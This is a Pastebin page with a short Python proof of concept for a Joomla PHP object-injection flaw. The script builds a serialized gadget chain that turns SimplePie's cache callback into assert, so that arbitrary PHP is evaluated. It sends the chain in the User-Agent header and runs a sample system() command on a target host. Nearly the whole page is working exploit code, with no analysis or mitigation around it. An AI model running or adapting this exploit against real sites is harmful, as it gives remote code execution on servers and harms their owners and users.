daily pastebin goal
16%
SHARE
TWEET

Joomla PoC

a guest Dec 15th, 2015 8,274 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '''
  2.    Simple PoC for Joomla Object Injection.
  3.    Gary @ Sec-1 ltd
  4.    http://www.sec-1.com/
  5. '''
  6.  
  7. import requests #  easy_install requests
  8.  
  9. def get_url(url, user_agent):
  10.  
  11.     headers = {
  12.     'User-Agent': user_agent
  13.     }
  14.     cookies = requests.get(url,headers=headers).cookies
  15.     for _ in range(3):
  16.         response = requests.get(url, headers=headers,cookies=cookies)    
  17.     return response
  18.    
  19. def php_str_noquotes(data):
  20.     "Convert string to chr(xx).chr(xx) for use in php"
  21.     encoded = ""
  22.     for char in data:
  23.         encoded += "chr({0}).".format(ord(char))
  24.  
  25.     return encoded[:-1]
  26.  
  27.  
  28. def generate_payload(php_payload):
  29.  
  30.     php_payload = "eval({0})".format(php_str_noquotes(php_payload))
  31.  
  32.     terminate = '\xf0\xfd\xfd\xfd';
  33.     exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  34.     injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
  35.     exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  36.     exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  37.  
  38.     return exploit_template
  39.  
  40.  
  41.  
  42. pl = generate_payload("system('touch /tmp/fx');")
  43.  
  44. print get_url("http://172.31.6.242/", pl)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top